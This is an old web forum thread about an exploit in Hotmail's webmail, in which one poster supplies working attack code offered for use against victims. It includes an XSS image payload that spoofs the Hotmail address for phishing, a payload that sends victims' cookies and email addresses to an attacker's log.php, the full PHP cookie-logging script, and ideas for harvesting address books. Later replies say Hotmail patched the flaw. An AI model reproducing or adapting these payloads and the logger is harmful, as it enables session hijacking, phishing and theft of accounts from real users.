Vort3x
I've just been looking at this Hotmail XSS attack; for people who couldn't
get it to work, you need to set the MIME type to HTML.

I've looked at this issue with IE, and I've noticed another problem: if I
send the line below to a Hotmail address, the URL gets spoofed.

<!--[if IE gte 5]><img src="javascript:window.location='http://www.google.com'"><![endif]-->

That will auto-redirect you to www.google.com, but look at the address bar;
for me it says:

http://by5fd.bay5.hotmail.msn.com/cgi-bin/...000001&a=foobar

OK, so what's good about a spoofed URL?
Well, it's from Hotmail; this will make for an EXTREMELY convincing phishing
attack, since it's not hard to view the source of www.hotmail.com, use the
find command and search for "form", and, well, everyone can figure out what to
do from there.

Also, it's possible to steal the user's cookies using the following line:

<!--[if IE gte 5]><img src="javascript:window.location='http://www.yoursite.com/log.php?email=victimsaddress@hotmail.com&cookie=' + document.cookie"><![endif]-->

Remember to type the victim's email address by hand, otherwise you won't know
whose it is.

Content of log.php

<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"])) {

$logcookie = $HTTP_GET_VARS["cookie"];
$logcookie = rawurldecode($logcookie); // turns URL encoding into normal text
$logemail = $HTTP_GET_VARS["email"];
$logemail = rawurldecode($logemail); // turns URL encoding into normal text

$handle=fopen($file, "r+"); // opening the file for reading (r+ also allows writing)
$filecontence=fread($handle,filesize("$file"));
fclose($handle);

$handle=fopen($file, "w"); // opening the file for writing
fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
// writing the email address and cookie, then the rest of the log
fclose($handle);
}
header("Location: http://www.hotmail.com");
?>

End of log.php

And of course you can add other stuff to log.php like an IP stealing
function.

Also, I think the possibilities are endless with this, since I think it's
possible to use iframes and other JavaScript to split the document.location
and get to the compose new message window and then load in addresses from
the address book, but <script language="JavaScript"> tags like this still
appear to be filtered. I think a number of img tags with JavaScript in
them will continue to be run, not sure yet.
aapje
old... posted some time ago
migo
yeah, Hotmail already patched this a long time ago now
mrBob
yep, only worked for like 3 days
chris105
In case something like this comes about again, how do I set a MIME type to HTML?
aapje
header("Content-Type: text/html; charset=iso-8859-1");

I believe
chris105
Cheers, didn't use this one, which was a shame; there are some really annoying people out there just crying to have horse porn downloaded to their computers.
Invision Power Board © 2001-2005 Invision Power Services, Inc.